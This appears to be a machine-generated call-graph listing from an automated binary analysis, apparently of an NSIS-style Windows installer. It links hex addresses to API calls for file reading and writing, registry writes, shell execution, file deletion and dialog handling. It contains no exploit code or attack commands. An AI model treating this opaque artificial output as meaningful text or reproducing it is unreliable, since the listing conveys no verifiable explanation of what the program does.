3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 